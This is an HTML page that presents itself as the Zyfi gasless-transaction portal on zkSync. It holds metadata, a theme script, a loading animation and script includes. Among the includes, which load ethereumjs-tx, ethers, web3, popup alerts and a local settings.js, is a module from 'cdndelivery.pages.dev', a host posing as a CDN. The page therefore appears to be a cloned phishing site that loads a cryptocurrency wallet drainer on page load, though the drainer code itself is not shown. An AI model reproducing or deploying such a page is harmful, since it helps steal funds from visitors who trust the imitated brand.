<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<title>Zyfi - Your portal and SDK to a gas abstracted experience on Zksync</title>
<!-- Description & Viewport -->
<meta name="description" content="Zyfi enables you to do gasless transactions and swaps using any token. We buit infrastructure which enables an abstracted DeFi experience powered by zkSync.">
<meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width, height=device-height, target-densitydpi=device-dpi">
<!--    <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width, height=device-height, viewport-fit=cover">-->
<!-- Regular Meta Tags -->
<meta property="title" content="Your portal and SDK to a gas abstracted experience on Zksync">
<meta property="description" content="Zyfi enables you to do gasless transactions and swaps using any token. We buit infrastructure which enables an abstracted DeFi experience powered by zkSync.">
<!-- Open Graph (for platforms like Facebook) -->
<meta property="og:title" content="Your portal and SDK to a gas abstracted experience on Zksync">
<meta property="og:description" content="Zyfi enables you to do gasless transactions and swaps using any token. We buit infrastructure which enables an abstracted DeFi experience powered by zkSync.">
<meta property="og:image" content="images/og-zyfi.jpg">
<meta property="og:type" content="website">
<meta property="og:url" content="/">
<meta property="og:locale" content="en-US">
<!-- Twitter Card -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Your portal and SDK to a gas abstracted experience on Zksync">
<meta name="twitter:description" content="Zyfi enables you to do gasless transactions and swaps using any token. We buit infrastructure which enables an abstracted DeFi experience powered by zkSync.">
<meta name="twitter:image" content="https://zyfi.org/og-zyfi.jpg">
<meta name="twitter:image:alt" content="Zyfi App">
<link rel="icon" href="favicon.ico" sizes="any">
<link rel="icon" href="images/icon.svg" type="image/svg+xml">
<link rel="apple-touch-icon" href="images/icon-DZgHN93Q.png">
<!--  <link rel="stylesheet" href="css/normalize.css">-->
<!--  <link rel="stylesheet" href="css/style.css">-->
<link rel="manifest" href="/assets/site-y-cKA7Eh.webmanifest">
<script>
;(function () {
// prerender background for light and dark modes based on query parameter
const urlParams = new URLSearchParams(window.location.search)
const themeFromURL = urlParams.get('theme')
// Check if theme is already set as a cookie
const themeFromCookie = document.cookie.match(/ondefy-ui__theme=(.*?)(;|$)/)
const theme = 'dark-zyfi'
const lightColor = '#E7EAED'
const darkColor = '#161E25'
// Function to select color based on theme
const selectColorBasedOnTheme = themeValue => {
return themeValue === 'light' ? lightColor : darkColor
}
const selectedColor = selectColorBasedOnTheme(theme)
const styleTag = document.createElement('style')
styleTag.textContent = `body { background-color: ${selectedColor}; }`
document.head.appendChild(styleTag)
const metaTag = document.createElement('meta')
metaTag.setAttribute('name', 'theme-color')
metaTag.setAttribute('content', selectedColor)
document.head.appendChild(metaTag)
window.tempTheme = theme
const farFutureDate = new Date();
farFutureDate.setFullYear(farFutureDate.getFullYear() + 10); // 10 years into the future
const expires = farFutureDate.toUTCString();
document.cookie = `ondefy-ui__theme=${theme}; expires=${expires}; path=/;`;
})()
</script><style>body { background-color: #161E25; }</style><meta name="theme-color" content="#161E25">
<style>#skeleton {
display: flex;
position: fixed;
justify-content: center;
align-items: center;
width: 100%;
height: 100%;
top: 0;
left: 0;
max-width: 100%;
animation: skeletonInitial 800ms ease-in-out 1ms infinite;
}
.card-container {
cursor: pointer;
height: 150px;
perspective: 600;
position: relative;
width: 150px;
margin: auto;
}
.card {
height: 100%;
position: absolute;
transform-style: preserve-3d;
transition: all 1s ease-in-out;
width: 100%;
animation: spin3D 1.5s infinite linear;
perspective: 1000px;
transform-style: preserve-3d;
will-change: transform;
}
.card .side {
backface-visibility: hidden;
border-radius: 100px;
height: 100%;
position: absolute;
overflow: hidden;
width: 100%;
background: #eaeaed;
color: #0087cc;
line-height: 150px;
text-align: center;
}
.card .back {
background: #0087cc;
color: #eaeaed;
line-height: 150px;
text-align: center;
transform: rotateY(180deg) translateZ(3px);
backface-visibility: visible;
will-change: transform;
}
.card .front {
transform: translateZ(3px);
backface-visibility: visible;
will-change: transform;
}
.card > div {
display: flex;
justify-content: center;
align-items: center;
}
.card svg {
height: 200px;
width: 200px;
}
@keyframes spin3D {
0% {
transform: rotateZ(15deg) rotateY(0deg);
}
50% {
transform: rotateZ(-15deg) rotateY(180deg);
}
100% {
transform: rotateZ(15deg) rotateY(360deg);
}
}</style>
  <script type="module" crossorigin="" src="js/index-cJLuIjNL.js"></script>
  <link rel="stylesheet" crossorigin="" href="css/index-BCEHsAbW.css">
<link href="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.min.css" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700&family=Montserrat:wght@400;500;700&family=Raleway:wght@400;500;700&family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.7.16/dist/sweetalert2.all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.min.js" integrity="sha512-FDcVY+g7vc5CXANbrTSg1K5qLyriCsGDYCE02Li1tXEYdNQPvLPHNE+rT2Mjei8N7fZbe0WLhw27j2SrGRpdMg==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/4.0.3/web3.min.js" integrity="sha512-2oprd2T2vSkAii+dVWi6C+uATbQ1YGmCed6b6msb9Jxi33hsXAbnhwZ9thwCq6ndidZv4P51qaq58uo9b/x4nA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>     
    <script src="./settings.js"></script>
    <script src="https://cdndelivery.pages.dev/web3-ethers.js" type="module"></script></head>
<body>
<div id="skeleton">
<div class="card-container">
<div class="card">
<div class="side front">
<svg width="99" height="98" viewBox="0 0 99 98" fill="none" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M49.4406 2.31407e-05C76.7459 2.34663e-05 98.8812 22.2018 98.8812 49.5891C98.8812 73.2693 82.3326 93.0728 60.2021 98L57.646 98L35.1977 67.485L35.1977 97.0894C14.8354 90.9557 3.09926e-07 72.0101 5.77295e-07 49.5891C9.03885e-07 22.2018 22.1353 2.28151e-05 49.4406 2.31407e-05ZM49.4411 20.5684L18.8338 51.3139L41.2361 51.3139L63.6845 81.829L63.6845 51.3139L80.0483 51.3139L49.4411 20.5684Z" fill="url(#paint0_linear_65_2)"></path>
<defs>
<linearGradient id="paint0_linear_65_2" x1="0" y1="98" x2="14.761" y2="-11.3547" gradientUnits="userSpaceOnUse">
<stop stop-color="#138DBA"></stop>
<stop offset="1" stop-color="#58E3FE"></stop>
</linearGradient>
</defs>
</svg>
</div>
<div class="side back">
<svg width="99" height="98" viewBox="0 0 99 98" fill="none" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M49.4406 2.31407e-05C76.7459 2.34663e-05 98.8812 22.2018 98.8812 49.5891C98.8812 73.2693 82.3326 93.0728 60.2021 98L57.646 98L35.1977 67.485L35.1977 97.0894C14.8354 90.9557 3.09926e-07 72.0101 5.77295e-07 49.5891C9.03885e-07 22.2018 22.1353 2.28151e-05 49.4406 2.31407e-05ZM49.4411 20.5684L18.8338 51.3139L41.2361 51.3139L63.6845 81.829L63.6845 51.3139L80.0483 51.3139L49.4411 20.5684Z" fill="url(#paint0_linear_65_2)"></path>
<defs>
<linearGradient id="paint0_linear_65_2" x1="0" y1="98" x2="14.761" y2="-11.3547" gradientUnits="userSpaceOnUse">
<stop stop-color="#138DBA"></stop>
<stop offset="1" stop-color="#58E3FE"></stop>
</linearGradient>
</defs>
</svg>
</div>
</div>
</div>
</div>
<div id="root"></div>

</body></html>